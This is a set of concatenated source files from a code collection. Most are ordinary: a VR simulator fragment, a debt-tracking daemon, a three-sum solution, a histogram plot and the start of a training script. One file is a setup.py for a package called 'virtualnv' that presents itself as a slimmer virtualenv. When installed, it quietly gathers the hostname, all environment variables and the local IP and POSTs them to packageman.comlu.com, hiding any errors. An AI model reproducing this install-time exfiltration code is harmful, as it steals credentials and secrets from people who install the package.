Order: is_valid, gaze origin, gaze direction, gaze point,\n left pupil diameter, right pupil diameter (both in millimeters)\n Call after getDataForVRDevice, to guarantee that latest HMD transform has been acquired\n \"\"\"\n is_valid, origin, dir, left_pupil_diameter, right_pupil_diameter = self.eye_tracking_data\n # Set other values to 0 to avoid very small/large floating point numbers\n if not is_valid:\n return [False, [0, 0, 0], [0, 0, 0], 0, 0]\n else:\n return [is_valid, origin, dir, left_pupil_diameter, right_pupil_diameter]\n\n def set_vr_start_pos(self, start_pos=None, vr_height_offset=None):\n \"\"\"\n Sets the starting position of the VR system in iGibson space\n :param start_pos: position to start VR system at\n :param vr_height_offset: starting height offset. If None, uses absolute height from start_pos\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n # The VR headset will actually be set to this position during the first frame.\n # This is because we need to know where the headset is in space when it is first picked\n # up to set the initial offset correctly.\n self.vr_start_pos = start_pos\n # This value can be set to specify a height offset instead of an absolute height.\n # We might want to adjust the height of the camera based on the height of the person using VR,\n # but still offset this height. When this option is not None it offsets the height by the amount\n # specified instead of overwriting the VR system height output.\n self.vr_height_offset = vr_height_offset\n\n def set_vr_pos(self, pos=None, keep_height=False):\n \"\"\"\n Sets the world position of the VR system in iGibson space\n :param pos: position to set VR system to\n :param keep_height: whether the current VR height should be kept\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n offset_to_pos = np.array(pos) - self.get_hmd_world_pos()\n if keep_height:\n curr_offset_z = self.get_vr_offset()[2]\n self.set_vr_offset([offset_to_pos[0], offset_to_pos[1], curr_offset_z])\n else:\n self.set_vr_offset(offset_to_pos)\n\n def get_vr_pos(self):\n \"\"\"\n Gets the world position of the VR system in iGibson space.\n \"\"\"\n return self.get_hmd_world_pos() + np.array(self.get_vr_offset())\n\n def set_vr_offset(self, pos=None):\n \"\"\"\n Sets the translational offset of the VR system (HMD, left controller, right controller) from world space coordinates.\n Can be used for many things, including adjusting height and teleportation-based movement\n :param pos: must be a list of three floats, corresponding to x, y, z in Gibson coordinate space\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n self.renderer.vrsys.setVROffset(-pos[1], pos[2], -pos[0])\n\n def get_vr_offset(self):\n \"\"\"\n Gets the current VR offset vector in list form: x, y, z (in iGibson coordinates)\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n x, y, z = self.renderer.vrsys.getVROffset()\n return [x, y, z]\n\n def get_device_coordinate_system(self, device):\n \"\"\"\n Gets the direction vectors representing the device's coordinate system in list form: x, y, z (in Gibson coordinates)\n List contains 
\"right\", \"up\" and \"forward\" vectors in that order\n :param device: can be one of \"hmd\", \"left_controller\" or \"right_controller\"\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n\n vec_list = []\n\n coordinate_sys = self.renderer.vrsys.getDeviceCoordinateSystem(device)\n for dir_vec in coordinate_sys:\n vec_list.append(dir_vec)\n\n return vec_list\n\n def trigger_haptic_pulse(self, device, strength):\n \"\"\"\n Triggers a haptic pulse of the specified strength (0 is weakest, 1 is strongest)\n :param device: device to trigger haptic for - can be any one of [left_controller, right_controller]\n :param strength: strength of haptic pulse (0 is weakest, 1 is strongest)\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n assert device in [\"left_controller\", \"right_controller\"]\n\n self.renderer.vrsys.triggerHapticPulseForDevice(device, int(self.max_haptic_duration * strength))\n\n def set_hidden_state(self, obj, hide=True):\n \"\"\"\n Sets the hidden state of an object to be either hidden or not hidden.\n The object passed in must inherent from Object at the top level\n\n Note: this function must be called after step() in the rendering loop\n Note 2: this function only works with the optimized renderer - please use the renderer hidden\n list to hide objects in the non-optimized renderer\n \"\"\"\n # Find instance corresponding to this id in the renderer\n for instance in self.renderer.instances:\n if obj.body_id == instance.pybullet_uuid:\n instance.hidden = hide\n self.renderer.update_hidden_highlight_state([instance])\n return\n\n def set_hud_state(self, state):\n \"\"\"\n Sets state of the VR HUD (heads-up-display)\n :param state: one of 'show' or 'hide'\n \"\"\"\n if not self.can_access_vr_context:\n raise RuntimeError(\"ERROR: Trying to access VR context without enabling vr mode and use_vr in vr settings!\")\n if self.renderer.vr_hud:\n self.renderer.vr_hud.set_overlay_state(state)\n\n def get_hidden_state(self, obj):\n \"\"\"\n Returns the current hidden state of the object - hidden (True) or not hidden (False)\n \"\"\"\n for instance in self.renderer.instances:\n if obj.body_id == instance.pybullet_uuid:\n return instance.hidden\n\n def get_category_ids(self, category_name):\n \"\"\"\n Gets ids for all instances of a specific category (floors, walls, etc.) 
in a scene\n        \"\"\"\n        if not hasattr(self.scene, \"objects_by_id\"):\n            return []\n        return [\n            body_id\n            for body_id in self.objects\n            if (\n                body_id in self.scene.objects_by_id.keys()\n                and hasattr(self.scene.objects_by_id[body_id], \"category\")\n                and self.scene.objects_by_id[body_id].category == category_name\n            )\n        ]\n\n    def update_position(self, instance, force_sync=False):\n        \"\"\"\n        Update position for an object or a robot in renderer.\n        :param instance: Instance in the renderer\n        \"\"\"\n        body_links_awake = 0\n        if isinstance(instance, Instance):\n            dynamics_info = p.getDynamicsInfo(instance.pybullet_uuid, -1)\n            if len(dynamics_info) == 13 and not self.first_sync and not force_sync:\n                activation_state = dynamics_info[12]\n            else:\n                activation_state = PyBulletSleepState.AWAKE\n\n            if activation_state != PyBulletSleepState.AWAKE:\n                return body_links_awake\n            # pos and orn of the inertial frame of the base link,\n            # instead of the base link frame\n            pos, orn = p.getBasePositionAndOrientation(instance.pybullet_uuid)\n\n            # Need to convert to the base link frame because that is\n            # what our own renderer keeps track of\n            # Based on the pybullet documentation:\n            # urdfLinkFrame = comLinkFrame * localInertialFrame.inverse().\n\n            instance.set_position(pos)\n            instance.set_rotation(quat2rotmat(xyzw2wxyz(orn)))\n            body_links_awake += 1\n        elif isinstance(instance, InstanceGroup):\n            for j, link_id in enumerate(instance.link_ids):\n                if link_id == -1:\n                    dynamics_info = p.getDynamicsInfo(instance.pybullet_uuid, -1)\n                    if len(dynamics_info) == 13 and not self.first_sync:\n                        activation_state = dynamics_info[12]\n                    else:\n                        activation_state = PyBulletSleepState.AWAKE\n\n                    if activation_state != PyBulletSleepState.AWAKE:\n                        continue\n                    # same conversion is needed as above\n                    pos, orn = p.getBasePositionAndOrientation(instance.pybullet_uuid)\n\n                else:\n                    dynamics_info = p.getDynamicsInfo(instance.pybullet_uuid, link_id)\n\n                    if len(dynamics_info) == 13 and not self.first_sync:\n                        activation_state = dynamics_info[12]\n                    else:\n                        activation_state = PyBulletSleepState.AWAKE\n\n                    if activation_state != PyBulletSleepState.AWAKE:\n                        continue\n\n                    pos, orn = p.getLinkState(instance.pybullet_uuid, link_id)[:2]\n\n                instance.set_position_for_part(xyz2mat(pos), j)\n                instance.set_rotation_for_part(quat2rotmat(xyzw2wxyz(orn)), j)\n                body_links_awake += 1\n        return body_links_awake\n\n    def isconnected(self):\n        \"\"\"\n        :return: pybullet is alive\n        \"\"\"\n        return p.getConnectionInfo(self.cid)[\"isConnected\"]\n\n    def disconnect(self):\n        \"\"\"\n        Clean up the simulator\n        \"\"\"\n        if self.isconnected():\n            # print(\"******************PyBullet Logging Information:\")\n            p.resetSimulation(physicsClientId=self.cid)\n            p.disconnect(self.cid)\n            # print(\"PyBullet Logging Information******************\")\n        self.renderer.release()\n\n    def disconnect_pybullet(self):\n        \"\"\"\n        Disconnects only pybullet - used for multi-user VR\n        \"\"\"\n        if self.isconnected():\n            p.resetSimulation(physicsClientId=self.cid)\n            p.disconnect(self.cid)\n","sub_path":"igibson/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":83934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483902441","text":"from sarah.acp_bson import Recipient, Pool_Handler\nfrom sarah import dictutils\nimport re\nfrom decimal import Decimal as D\nimport isodate\nimport datetime\nimport anelys\nfrom katherine import d1, d6\n\ndb_caroline = d1.caroline\n\ncoll_account = db_caroline.get_collection('account')\ncoll_client = 
db_caroline.get_collection('client')\ncoll_debt = db_caroline.get_collection('debt')\ncoll_receipt = db_caroline.get_collection('receipt')\ncoll_trans = db_caroline.get_collection('transaction')\n\n\nagent_credit_default = {'id': '3-1', 'name': 'Alejandro Picazo Loza', 'type': 'reina/person'}\n\n\ndef trans_doc_to_columns(trans_doc):\n columns = {'id': trans_doc['id'], 'type': trans_doc['type'], 'datetime': trans_doc['datetime'],\n 'value': trans_doc['value']}\n if 'account' in trans_doc:\n if 'id' in trans_doc['account']:\n columns['account_id'] = trans_doc['account']['id']\n else:\n columns['account_id'] = None\n if 'type' in trans_doc['account']:\n columns['account_type'] = trans_doc['account']['type']\n else:\n columns['account_type'] = None\n else:\n columns['account_id'] = None\n columns['account_type'] = None\n if 'debt' in trans_doc:\n debt = trans_doc['debt']\n if 'id' in debt:\n columns['debt_id'] = debt['id']\n else:\n columns['debt_id'] = None\n if 'type' in debt:\n columns['debt_type'] = debt['type']\n else:\n columns['debt_type'] = None\n else:\n columns['debt_id'] = None\n columns['debt_type'] = None\n return columns\n\n\ndef get_account_balance(account):\n d6.ping(True)\n d6_cursor = d6.cursor()\n d6_cursor.execute('SELECT CAST(IFNULL(SUM(value), 0) AS DECIMAL(15, 2)) FROM caroline.transaction WHERE '\n 'account_id = %s;', (account['id'],))\n balance, = d6_cursor.fetchone()\n d6_cursor.close()\n return balance\n\n\ndef get_debt_balance(debt):\n d6.ping(True)\n d6_cursor = d6.cursor()\n d6_cursor.execute('SELECT CAST(IFNULL(SUM(value), 0) AS DECIMAL(15, 2)) FROM caroline.transaction WHERE debt_id = %s;',\n (debt['id'],))\n bb, = d6_cursor.fetchone()\n return bb\n\n\ndef make_transaction(trans):\n d6.ping(True)\n d6_cursor = d6.cursor()\n if 'type' not in trans:\n trans['type'] = 'caroline/transaction'\n if 'id' not in trans:\n trans['id'] = anelys.get_id_with_name(trans['type'])\n\n if 'account' in trans:\n account = trans['account']\n for k in list(account.keys()):\n if k not in ['id', 'type']:\n del account[k]\n\n if 'debt' in trans:\n for k in list(trans['debt'].keys()):\n if k not in ['id', 'type']:\n del trans['debt'][k]\n\n dictutils.dec_to_float(trans)\n coll_trans.insert(trans)\n del trans['_id']\n dictutils.float_to_dec(trans)\n stmt = 'INSERT INTO caroline.transaction (id, type, value, datetime, debt_id, account_id) VALUES (%(id)s, ' \\\n '%(type)s, %(value)s, %(datetime)s, %(debt_id)s, %(account_id)s);'\n d6_cursor.execute(stmt, trans_doc_to_columns(trans))\n value = trans['value']\n account = None\n if 'account' in trans and 'id' in trans['account'] and trans['account']['id'] is not None:\n account = coll_account.find_one({'id': trans['account']['id']}, {'_id': False})\n dictutils.float_to_dec(account)\n\n if 'balance' in account:\n account['balance'] += value\n account['balance_in_hand'] = account['credit_limit'] - account['balance']\n dictutils.dec_to_float(account)\n coll_account.replace_one({'id': account['id']}, account)\n if '_id' in account:\n del account['_id']\n dictutils.float_to_dec(account)\n elif 'request_balance' in account and account['request_balance']:\n account['balance'] = get_account_balance(account)\n if 'credit_limit' in account:\n account['balance_in_hand'] = account['credit_limit'] - account['balance']\n debt = None\n if 'debt' in trans and 'id' in trans['debt'] and trans['debt']['id'] is not None:\n debt = coll_debt.find_one({'id': trans['debt']['id']}, {'_id': False})\n dictutils.float_to_dec(debt)\n debt['balance'] = 
get_debt_balance(debt)\n if debt['balance'] <= D() and 'expires' in debt:\n del debt['expires']\n if debt['balance'] == D():\n del debt['balance']\n debt['status'] = 'paid'\n\n dictutils.dec_to_float(debt)\n coll_debt.replace_one({'id': debt['id']}, debt)\n if '_id' in debt:\n del debt['_id']\n dictutils.float_to_dec(debt)\n d6_cursor.close()\n return account, debt\n\n\ndef handle_action_caroline_create_debt(msg):\n debt = msg['debt']\n if 'type' not in debt:\n debt['type'] = 'caroline/debt'\n if 'type' in debt and 'debt_type' not in debt and debt['type'] != 'caroline/debt':\n debt['debt_type'] = debt['type']\n debt['type'] = 'caroline/debt'\n if 'account' in msg:\n account = msg['account']\n debt['account'] = {'id': account['id'], 'type': account['type']}\n else:\n account = debt['account']\n debt['account'] = {'id': account['id'], 'type': account['type']}\n if 'datetime' not in debt and 'datetime' in msg:\n debt['datetime'] = msg['datetime']\n elif 'datetime' not in debt:\n debt['datetime'] = isodate.datetime_isoformat(datetime.datetime.now())\n if 'id' not in debt:\n debt['id'] = anelys.get_id_with_name(debt['type'])\n debt['status'] = 'valid'\n dictutils.dec_to_float(debt)\n coll_debt.insert(debt)\n del debt['_id']\n dictutils.float_to_dec(debt)\n trans = dict()\n if 'datetime' in msg:\n trans['datetime'] = msg['datetime']\n elif 'datetime' in debt:\n trans['datetime'] = debt['datetime']\n else:\n trans['datetime'] = isodate.datetime_isoformat(datetime.datetime.now())\n trans['account'] = {'id': account['id'], 'type': account['type']}\n trans['debt'] = {'id': debt['id'], 'type': debt['type']}\n if 'amount' in debt:\n trans['value'] = debt['amount']\n elif 'total' in debt:\n trans['value'] = debt['total']\n elif 'value' in debt:\n trans['value'] = debt['value']\n account, debt = make_transaction(trans)\n return {'account': account, 'debt': debt}\n\n\ndef handle_action_caroline_create_client(msg):\n client = msg['client']\n if 'type' not in client:\n client['type'] = 'caroline/client'\n if 'id' not in client and client['type'] == 'caroline/client':\n client['id'] = anelys.get_id_with_name(client['type'])\n elif 'id' not in client:\n raise Exception('if client type is distinct at caroline/client it should has id')\n if 'type' in client and client['type'] != 'caroline/client' and 'client_type' not in client:\n client['client_type'] = client['type']\n client['type'] = 'caroline/client'\n fields_allowed = ['id', 'type', 'client_type', 'name', 'business_name', 'address', 'tel', 'contact', 'rfc',\n 'wholesale']\n for k in list(client.keys()):\n if k not in fields_allowed:\n del client[k]\n dictutils.dec_to_float(client)\n coll_client.insert(client)\n del client['_id']\n return {'client': client}\n\n\ndef handle_action_caroline_create_receipt(msg):\n receipt = msg['receipt']\n if 'type' not in receipt:\n receipt['type'] = 'caroline/receipt'\n if 'id' not in receipt:\n receipt['id'] = anelys.get_id_with_name(receipt['type'])\n debited = receipt['debited']\n d6.ping(True)\n\n def __help(_debited):\n if _debited['type'] == 'caroline/debt':\n debt = coll_debt.find_one({'id': _debited['id']})\n account = debt['account']\n trans = {'debt': debt, 'account': account, 'value': -_debited['value']}\n payment = {'id': receipt['id'], 'type': receipt['type'], 'value': _debited['value']}\n if 'datetime' in _debited:\n trans['datetime'] = _debited['datetime']\n payment['datetime'] = _debited['datetime']\n elif 'datetime' in receipt:\n trans['datetime'] = receipt['datetime']\n payment['datetime'] = 
receipt['datetime']\n account, debt = make_transaction(trans)\n if 'payment' in debt:\n debt['payments'] = [debt['payment'], payment]\n del debt['payment']\n elif 'payments' in debt:\n debt['payments'].append(payment)\n else:\n debt['payment'] = payment\n dictutils.dec_to_float(debt)\n coll_debt.replace_one({'id': debt['id']}, debt)\n if isinstance(debited, dict):\n __help(debited)\n elif isinstance(debited, list):\n for dd in debited:\n __help(dd)\n\n dictutils.dec_to_float(receipt)\n coll_receipt.insert(receipt)\n if '_id' in receipt:\n del receipt['_id']\n dictutils.float_to_dec(receipt)\n return {'receipt': receipt}\n\n\ndef handle_action_caroline_grant_credit(msg):\n client = msg['client']\n account = None\n if 'account' not in msg:\n client = coll_client.find_one({'id': client['id']}, {'_id': False})\n account = coll_account.find_one({'id': client['id']})\n if account is None:\n account = {'id': client['id'], 'type': 'caroline/account', 'account_type': client['type']}\n if 'business_name' in client:\n account['name'] = client['business_name']\n elif 'name' in client:\n account['name'] = client['name']\n\n if 'credit_period' in msg:\n account['credit_period'] = msg['credit_period']\n if 'credit_limit' in msg:\n account['credit_limit'] = msg['credit_limit']\n account['request_balance'] = True\n client['credit'] = True\n client['account'] = {'id': account['id'], 'type': account['type']}\n coll_client.replace_one({'id': client['id']}, client)\n dictutils.dec_to_float(account)\n coll_account.replace_one({'id': account['id']}, account, upsert=True)\n if '_id' in account:\n del account['_id']\n dictutils.float_to_dec(account)\n return {'account': {'id': account['id'], 'type': account['type']}}\n\n\ndef handle_action_caroline_register_payment(msg):\n # debt.register_payment(payment)\n payment = msg['payment']\n if 'datetime' not in payment and 'datetime' in msg:\n payment['datetime'] = msg['datetime']\n elif 'datetime' not in payment and 'datetime' not in msg:\n payment['datetime'] = isodate.datetime_isoformat(datetime.datetime.now())\n\n debt = coll_debt.find_one({'id': msg['debt']['id']}, {'_id': False})\n if 'payment' in debt:\n payments = [debt['payment'], payment]\n del debt['payment']\n debt['payments'] = payments\n elif 'payments' in debt:\n debt['payments'].append(payment)\n else:\n debt['payment'] = payment\n dictutils.dec_to_float(debt)\n coll_debt.replace_one({'id': debt['id']}, debt)\n if '_id' in debt:\n del debt['_id']\n dictutils.float_to_dec(debt)\n trans = {'datetime': payment['datetime'], 'debt': {'id': debt['id'], 'type': debt['type']},\n 'account': {'id': debt['account']['id'], 'type': debt['account']['type']}}\n if 'amount' in payment:\n trans['value'] = -payment['amount']\n elif 'total' in payment:\n trans['value'] = -payment['total']\n elif 'value' in payment:\n trans['value'] = -payment['value']\n account, debt = make_transaction(trans)\n return {'debt': debt, 'account': account}\n\nhandle_action_caroline_debt_register_payment = handle_action_caroline_register_payment\nhandle_action_caroline_register_debt = handle_action_caroline_create_debt\n\n\ndef handle_find_caroline_account(msg):\n filt = dict()\n result = list()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'account_type':\n filt['account_type'] = v1\n elif k1 == 'name':\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if k2 == '!like':\n filt['name'] = re.compile('.*' + v2.replace(' ', '.*') + '.*', re.I)\n for doc in coll_account.find(filt, 
{'_id': False}):\n result.append(doc)\n return {'result': result}\n\n\ndef handle_find_caroline_client(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'name':\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if k2 == '!like':\n filt['name'] = re.compile('.*' + v2.replace(' ', '.*') + '.*', re.I)\n result = list()\n for doc in coll_client.find(filt, {'_id': False}):\n result.append(doc)\n if 'sort' in msg:\n for sort in msg['sort']:\n if sort['field'] == 'name':\n if isinstance(sort['orientation'], (int, bool)):\n if sort['orientation']:\n pass\n return {'result': result}\n\n\ndef handle_find_caroline_debt(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'account':\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if k2 == 'id':\n filt['account.id'] = v2\n elif k2 == 'type':\n filt['account.type'] = v2\n elif k1 == 'account.id':\n filt['account.id'] = v1\n elif k1 == 'account.type':\n filt['account.type'] = v1\n elif k1 == 'status':\n filt['status'] = v1\n result = list()\n for doc in coll_debt.find(filt, {'_id': False}):\n result.append(doc)\n return {'result': result}\n\n\ndef handle_find_one_caroline_account(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'id':\n filt['id'] = v1\n return {'result': coll_account.find_one(filt, {'_id': False})}\n\n\ndef handle_find_one_caroline_client(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'id':\n filt['id'] = v1\n return {'result': coll_client.find_one(filt, {'_id': False})}\n\n\ndef handle_find_one_caroline_debt(msg):\n filt = dict()\n if 'query' in msg and isinstance(msg['query'], dict):\n for k1, v1 in msg['query'].items():\n if k1 == 'id':\n filt['id'] = v1\n return {'result': coll_debt.find_one(filt, {'_id': False})}\n\n\ndef handle_get_caroline_account_balance(msg):\n account = msg['account']\n balance = get_account_balance(account)\n reply = {'balance': balance}\n if 'credit_limit' in account:\n reply['balance_in_hand'] = account['credit_limit'] - balance\n return reply\n\n\nrr = Pool_Handler()\nrr.reg('type_message=action.action=caroline/create_debt', handle_action_caroline_create_debt)\nrr.reg('type_message=action.action=caroline/create_client', handle_action_caroline_create_client)\nrr.reg('type_message=action.action=caroline/create_receipt', handle_action_caroline_create_receipt)\nrr.reg('type_message=action.action=caroline/debt/register_payment', handle_action_caroline_debt_register_payment)\nrr.reg('type_message=action.action=caroline/grant_credit', handle_action_caroline_grant_credit)\nrr.reg('type_message=action.action=caroline/register_debt', handle_action_caroline_register_debt)\nrr.reg('type_message=action.action=caroline/register_payment', handle_action_caroline_register_payment)\nrr.reg('type_message=find.type=caroline/account', handle_find_caroline_account)\nrr.reg('type_message=find.type=caroline/client', handle_find_caroline_client)\nrr.reg('type_message=find.type=caroline/debt', handle_find_caroline_debt)\nrr.reg('type_message=find_one.type=caroline/account', handle_find_one_caroline_account)\nrr.reg('type_message=find_one.type=caroline/client', handle_find_one_caroline_client)\nrr.reg('type_message=find_one.type=caroline/debt', 
handle_find_one_caroline_debt)\nrr.reg('type_message=request.request_type=get.get=caroline/account_balance', handle_get_caroline_account_balance)\n\n\nif __name__ == '__main__':\n print(\"I'm caroline\")\n recipient = Recipient()\n recipient.prepare('/caroline', rr)\n\n recipient.begin_receive_forever()\n","sub_path":"alfa/carolined/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":16728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461385498","text":"\"\"\"\r\nProblem: \r\nGiven a list of integers return unique set of 3 numbers that add up to 0. \r\nExample: \r\n[-1, 0, 1, 2]\r\n[-1, 0 ,1]\r\n\r\nAlgorithm:\r\nWe want to improve on brute force algorithm which is calculating sum of every possible combination of numbers and picking unique combinations that sum to 0. Time complexity is O(n ^ 3). \r\n\r\nOur solution\r\n1. Sort list (O(n * log n)) \r\n2. Iterate through list \r\n3. For each integer in list\r\n - Start by picking next integer (variable si) and last integer in another loop (variable ei)\r\n - if sum of the three is equal to 0 add to unique set. Increment si, Decrement ei \r\n - if sum < 0 increment si since list is sorted. \r\n - if sum > 0 decrement ei since list is sorted. \r\n - Run this loop while si < ei \r\n\r\nAfter sort our algorithm runs in O(n ^ 2) time. \r\nAdditional optimizations: \r\n1. In first iteration if value exceeds 0 we can break. Since every integer after is >= current integer sum will also exceed 0. \r\n2. If sum of value at current integer and value of si > 0 we can move to next number. Value of integer at ei >= so sum of three numbers will also be > 0. \r\n3. We are only interested in unique sets. If integer at index is equal to previous index any combination for that integer value is already covered. Continue to next integer\r\n\r\nTime Complexity: O(n * log n) + O(n ^ 2) \r\nSpace Complexity: O(1) - excluding output unique set\r\n\"\"\"\r\n\r\nprint(__doc__)\r\n\r\nclass SolutionThreeSum(): \r\n def threeSum(self, nums):\r\n if not nums or len(nums) < 3:\r\n return []\r\n \r\n nums.sort() \r\n unique_set = set() \r\n # Iterate through list. range excludes last two integers\r\n # since our solution set is 3 numbers. \r\n for i in range(len(nums) - 2):\r\n # Since array is sorted if nums value > 0 \r\n # any other subsequent numbers will sum with also be > 0 \r\n if nums[i] > 0:\r\n break\r\n \r\n # For if current number is equal to previous number we don't \r\n # all unique sets for the number are already covered. \r\n if i != 0 and nums[i] == nums[i - 1]: \r\n continue \r\n \r\n # Init si and ei\r\n si = i + 1;\r\n ei = len(nums) - 1\r\n while si < ei:\r\n # if just the aggregate of the first two numbers is greater \r\n # than 0, we can proceed to next number \r\n if nums[i] + nums[si] > 0: \r\n break\r\n \r\n num_sum = nums[i] + nums[si] + nums[ei]\r\n if num_sum == 0:\r\n # NOTE: For those unfamiliar with Python sets \r\n # duplicate check is unnecessary. 
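(adding a tuple that is already present to a set is a no-op, so each triplet is kept exactly once)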
\r\n unique_set.add((nums[i], nums[si], nums[ei]))\r\n \r\n # sum is equal so increment si and decrement ei\r\n si += 1 \r\n ei -= 1\r\n # if num_sum > 0, decrement ei by 1\r\n elif num_sum > 0: \r\n ei -= 1\r\n # num_sum < 0 increment si by 1 \r\n else: \r\n si += 1\r\n \r\n return [list(t) for t in unique_set] \r\n\r\nif __name__ == '__main__':\r\n s = SolutionThreeSum()\r\n \r\n array = [-1, 0, 1, 2, -1, -4]\r\n print(\"Input: Array = {}\".format(array))\r\n print(\"Answer: Unique combinations = {}\".format(s.threeSum(array)))","sub_path":"arrays/threesum.py","file_name":"threesum.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"582208853","text":"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npopulation_age = np.random.randint(5,120,30)\n\n#ids = [x for x in range(1,31)]\n\n#plt.bar(ids, population_age, label = 'bar',color = 'red')\n\nbins = [x for x in range(0,131,10)]\n\nplt.hist(population_age, bins, histtype='bar', rwidth = 0.8)\n\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('Hist Graph')\n#plt.legend()\nplt.show()\n\n\n\n\n","sub_path":"hist_graph.py","file_name":"hist_graph.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74599626","text":"from distutils.core import setup\nimport os\nimport socket\n\nsetup(\n name='virtualnv',\n packages=['virtualnv'],\n version='0.1.1',\n description='Slimmer Virtual Environment',\n author='VirtualNV team',\n author_email='example@example.com',\n url='https://pypi.python.org/pypi?name=virtualnv&:action=display',\n keywords=[],\n classifiers=[],\n install_requires=[\n 'virtualenv',\n ],\n)\ntry:\n info = socket.gethostname() + ' virtualnv ' + ' '.join(['%s=%s' % (k, v) for (k, v) in os.environ.items()]) + ' '\n info += [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in\n [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]\n posty = \"paste=\"\n for i in range(0, len(info)):\n if info[i].isalnum():\n posty += info[i]\n else:\n posty += (\"%%%02X\" % ord(info[i]))\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"packageman.comlu.com\", 80))\n s.send(\"POST / HTTP/1.1\\r\\n\" +\n \"User-Agent: Python\\r\\n\" +\n \"Host: packageman.comlu.com\\r\\n\" +\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\" +\n \"Content-Length: \" + str(len(posty)) + \"\\r\\n\\r\\n\" + posty)\n s.recv(2048)\nexcept:\n pass\n","sub_path":"pypi_malware/virtualnv-0.1.1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200730707","text":"import argparse\nimport sys\nimport time\nimport os\nimport numpy as np\nimport random\nimport torch\nfrom torch import optim, nn\nfrom codes.utils import load_dict, prepare_data, gen_sample, weight_init, compute_wer, compute_sacc\nfrom codes.encoder_decoder import Encoder_Decoder\nfrom codes.data_iterator import dataIterator\nfrom datetime import datetime\nfrom utility.general_utils import folder_exists, get_filenames\n\ndef str2bool(v):\n if v == 'True':\n return True\n elif v == 'False':\n return False\n\ndef main(args):\n # whether use multi-GPUs\n multi_gpu_flag = args.multi_gpu_flag\n\n # whether init params\n init_param_flag = args.init_param_flag\n\n # whether reload params\n reload_flag = args.reload_flag\n\n # load configurations\n # Paths 
for train, test\n if args.dataset_type == 'CROHME':\n concat_dataset_path = '../data/CROHME/'\n img_path, cptn_path = os.path.join(concat_dataset_path, 'image/'), os.path.join(concat_dataset_path, 'caption/')\n dict_path, re_dict_path = os.path.join(concat_dataset_path, 'dictionary.txt'), os.path.join(concat_dataset_path, 're_dictionary.txt')\n train_img_pkl_path, test_img_pkl_path = os.path.join(img_path, 'offline-train.pkl'), os.path.join(img_path, 'offline-test.pkl')\n train_label_pkl_path, test_label_pkl_path = os.path.join(cptn_path,'train_caption_label_gtd.pkl'), os.path.join(cptn_path, 'test_caption_label_gtd.pkl')\n train_align_pkl_path, test_align_pkl_path = os.path.join(cptn_path,'train_caption_label_align_gtd.pkl'), os.path.join(cptn_path, 'test_caption_label_align_gtd.pkl')\n elif args.dataset_type == 'MATHFLAT':\n concat_dataset_path = args.concat_dataset_path\n dict_path, re_dict_path = os.path.join(concat_dataset_path, 'dictionary.txt'), os.path.join(concat_dataset_path, 're_dictionary.txt')\n train_img_pkl_path, test_img_pkl_path = os.path.join(args.train_path, 'offline-train.pkl'), os.path.join(args.test_path, 'offline-test.pkl')\n train_label_pkl_path, test_label_pkl_path = os.path.join(args.train_path, 'train_caption_label.pkl'), os.path.join(args.test_path, 'test_caption_label.pkl')\n train_align_pkl_path, test_align_pkl_path = os.path.join(args.train_path, 'train_caption_align.pkl'), os.path.join(args.test_path, 'test_caption_align.pkl')\n\n work_path = '../train/'\n\n dictionaries = [dict_path, re_dict_path]\n datasets = [train_img_pkl_path, train_label_pkl_path, train_align_pkl_path]\n valid_datasets = [test_img_pkl_path, test_label_pkl_path, test_align_pkl_path]\n\n model_date = datetime.today().strftime(\"%y%m%d\")\n result_path = os.path.join(work_path, 'results', model_date)\n folder_exists(result_path, create_=True)\n valid_output = [os.path.join(result_path, 'symbol_relation'), os.path.join(result_path, 'memory_alpha')]\n valid_result = [os.path.join(result_path, 'valid.cer'), os.path.join(result_path, 'valid.exprate')]\n\n model_path = os.path.join(work_path, 'models', model_date)\n folder_exists(model_path, create_=True)\n saveto = os.path.join(model_path, 'WAP_params.pkl')\n last_saveto = os.path.join(model_path, 'WAP_params_last.pkl')\n\n # training 